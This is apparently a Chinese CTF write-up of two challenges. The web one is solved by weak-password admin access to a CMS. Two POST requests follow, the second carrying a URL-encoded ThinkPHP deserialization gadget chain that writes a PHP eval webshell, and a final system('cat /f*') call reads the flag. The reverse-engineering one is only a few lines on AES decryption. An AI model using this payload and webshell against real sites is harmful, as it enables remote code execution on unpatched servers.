这两道题属于比较简单的,顺道说一下,今年的题有点抽象,web不是misc,re不是web的,也有可能时代在进步,现在要求全栈了吧
web1
最开始被强网的小浣熊带偏思路了,进来疯狂找sql注入,结果后台弱口令一试,
找了一堆POC,都打不通,进到后台试了半天文件上传也不行,最后只能针对cms版本进行攻击,找到了
https://cn-sec.com/archives/2640154.html文章,照着文章里的方法打就好了:
进左侧最下面的功能地图把栏目字段启用
POST /login.phpm=admin&c=Field&a=arctype_add&_ajax=1&lang=cn
title=poc3&name=poc3&dtype=region&dfvalue=1&remark=&typeids%5B%5D=0&channel_id=-99
之后会新建一个poc3的字段,要记住这个字段的ID
然后打POC:
POST /login.phpm=admin&c=Field&a=arctype_edit&_ajax=1&lang=cn
title=poc3&name=poc3&old_dtype=region&dfvalue=O%3A27%3A%22think%5Cprocess%5Cpipes%5CWindows%22%3A1%3A%7Bs%3A5%3A%22files%22%3Ba%3A1%3A%7Bi%3A0%3BO%3A17%3A%22think%5Cmodel%5CPivot%22%3A2%3A%7Bs%3A6%3A%22append%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A8%3A%22getError%22%3B%7Ds%3A5%3A%22error%22%3BO%3A27%3A%22think%5Cmodel%5Crelation%5CHasOne%22%3A1%3A%7Bs%3A5%3A%22query%22%3BO%3A20%3A%22think%5Cconsole%5COutput%22%3A2%3A%7Bs%3A6%3A%22styles%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A16%3A%22removeWhereField%22%3B%7Ds%3A6%3A%22handle%22%3BO%3A30%3A%22think%5Csession%5Cdriver%5CMemcached%22%3A1%3A%7Bs%3A7%3A%22handler%22%3BO%3A23%3A%22think%5Ccache%5Cdriver%5CFile%22%3A2%3A%7Bs%3A3%3A%22tag%22%3Bs%3A1%3A%22t%22%3Bs%3A7%3A%22options%22%3Ba%3A1%3A%7Bs%3A4%3A%22path%22%3Bs%3A68%3A%22php%3A%2F%2Ffilter%2Fstring.rot13%2Fresource%3D%3C%3Fcuc+%40riny%28%24_TRG%5B_%5D%29%3B%3F%3E%2F…%2Fa.php%22%3B%7D%7D%7D%7D%7D%7D%7D%7D&old_dfvalue=1&remark=&typeids%5B%5D=0&channel_id=-99&id=545&old_name=poc3&dtype[]=region
之后就getshell了,
/a.php617ac73525b333bea4ac35a717dd8b0a.php_=system(‘cat /f*’);
Re2
拖到jar反编译工具里,发现该处存在密钥和加密方法提示(AES):
正则提取密文
直接GPT:
直接跑